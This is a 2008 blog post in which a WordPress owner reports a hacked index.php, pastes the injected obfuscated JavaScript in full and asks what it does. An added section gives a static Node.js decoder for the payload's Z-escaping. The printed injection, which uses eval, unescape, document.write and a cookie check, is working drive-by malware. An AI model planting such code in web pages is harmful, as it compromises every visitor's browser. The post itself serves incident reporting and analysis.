Thursday, October 2, 2008

Attacks on my Blog

This is the second time that one of my sites has been hacked. This time, too, it was not a serious hack. Just a random hack, I guess. I use WordPress on one of my blogs. The following file had been changed.

Filename: (root)\index.php

The normal contents of the file are as follows:
But I could see the changes that'd been made. The changed contents looked like this:

<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
echo '‹script language="javascript">$="Z63cZ3dZ226egthZ253bi+Z252bZ2529Z257btmpZ253dds.sZ256cZ2569ceZ2528i,Z2569+Z2531Z2529Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dzZ3dZ22Z2566Z2575nZ2563Z2574Z2569on Z2564Z2577(t)Z257bcZ2561Z253dZ2527Z252564ocuZ2525Z2536dZ252565nZ252574.wrZ2525Z25369Z2574Z252565(Z252522Z2527;cZ2565Z253dZ2527Z252522Z252529Z2527Z253bcbZ253dZ2527Z25253csZ252563rZ25256Z2539pt Z2525Z2536cZ252561Z256eZ2567Z2575Z252561geZ25253dZ25255cZ252522jaZ2576asZ2563rZ252569Z2570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570tZ25253eZ2527;evZ2561Z256c(Z2575nesZ2563apeZ2528t))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;cbZ3dZ22Z2528ds)Z253bsZ2574Z253dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cdsZ252elZ2565Z25Z22;opZ3dZ22Z2524Z253dZ2522dw(dcsZ2528cu,Z2531Z2534));Z2522Z253bZ22;stZ3dZ22Z2573tZ253dZ2522$Z253dZ2573Z2574;Z2564Z2563Z2573(Z2564Z2561Z252bdZ2562+Z2564Z2563+Z2564dZ252bZ2564eZ252c1Z2530Z2529Z253bdZ2577(Z2573Z2574Z2529;Z2573Z2574Z253dZ2524;Z2522;Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;yqz`;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ22Z2563haZ2572CodZ2565Z2541t(Z2530)Z255e(Z25270x00Z2527+esZ2529Z2529);}Z257dZ22;cdZ3dZ223bstZ253dsZ2574+StZ2572ingZ252efrZ256fmZ2543harZ2543odeZ2528(tmZ2570Z252eZ22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z
3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566uncZ2574ioZ256e czZ2528cz)Z257brZ2565tuZ2572n cZ2561+cbZ252bccZ252bcdZ252bceZ252bcZ257a;}Z253bZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;caZ3dZ22Z2566uncZ2574ionZ2520Z2564csZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573Z2563apeZ22;Z69Z66 (dZ6fcuZ6denZ74.coZ6fkZ69eZ2eindZ65xOZ66Z28Z27vbulZ6cZ65Z74in_Z6duZ6ctZ69Z71uotZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbuZ6cleZ74Z69Z6e_muZ6ctiqZ75oZ74eZ3dZ27,2,7);Z65valZ28Z75neZ73Z63apZ65(Z64Z7a+czZ2boZ70+sZ74)Z2bZ27dw(dz+Z63Z7a($+Z73t))Z3bZ27)}elsZ65Z7b$Z3dZ27Z27};funZ63tioZ6eZ20scZ28cnmZ2cZ76,Z65d)Z7bvZ61r eZ78dZ3dnew DZ61tZ65(Z29;eZ78d.Z73eZ74DaZ74eZ28exdZ2egZ65tZ44atZ65Z28)Z2bZ65d)Z3bdoZ63umZ65ntZ2ecZ6fokiZ65Z3dcZ6em+ Z27Z3dZ27 +esZ63apZ65(Z76)+Z27;Z65xZ70Z69Z72eZ73Z3dZ27+exd.Z74oGMZ54Z53triZ6eg()Z3bZ7d;";function z(s){r="";for(i=0;i‹s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);';
require('./wp-blog-header.php');
?>
I believe this is JavaScript code used for some sort of unwanted activity. If anyone knows exactly what this script does, then please do drop in a few lines about it and about what I can do to prevent such incidents.

Thanks in advance.
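
The `z()` helper at the end of the injected script swaps every `Z` for `%` and calls `unescape()` before the result is passed to `eval`. As an added example (not part of the original post), the Node.js code below applies that same transformation statically, with no `eval` or `document.write`, to two short fragments copied from the payload above; the function and constant names are assumptions of this example.

```javascript
// Added example: static decoder for the "Z"-for-"%" obfuscation in the payload.
// It only returns strings; nothing decoded here is ever executed.

// Decode one layer of %XX escapes. Malformed sequences are left untouched
// (decodeURIComponent would throw on them). %uXXXX escapes are not handled.
function percentDecodeOnce(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Same transformation as the page's z(): every "Z" becomes "%", then unescape.
function decodeZLayer(s) {
  return percentDecodeOnce(s.replace(/Z/g, "%"));
}

// Peel nested %XX layers until the text stops changing (bounded by maxLayers).
// Returns every intermediate stage so an analyst can see each layer.
function peelLayers(s, maxLayers = 5) {
  const stages = [decodeZLayer(s)];
  for (let i = 1; i < maxLayers; i++) {
    const prev = stages[stages.length - 1];
    const next = percentDecodeOnce(prev);
    if (next === prev) break;
    stages.push(next);
  }
  return stages;
}

// Fragments copied from the payload shown in the post.
const FRAGMENT_A =
  "Z69Z66 (dZ6fcuZ6denZ74.coZ6fkZ69eZ2eindZ65xOZ66Z28Z27vbulZ6cZ65Z74" +
  "in_Z6duZ6ctZ69Z71uotZ65Z3dZ27)Z3dZ3d-1)";
const FRAGMENT_B = "Z2566Z2575nZ2563Z2574Z2569on Z2564Z2577(t)";

for (const [name, frag] of [["A", FRAGMENT_A], ["B", FRAGMENT_B]]) {
  peelLayers(frag).forEach((stage, i) =>
    console.log(`fragment ${name}, layer ${i + 1}: ${stage}`));
}
```

Fragment B needs two passes because its escapes are themselves escaped (`Z25` decodes to `%`), which is why the injected script calls `unescape()` again inside its `eval`.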
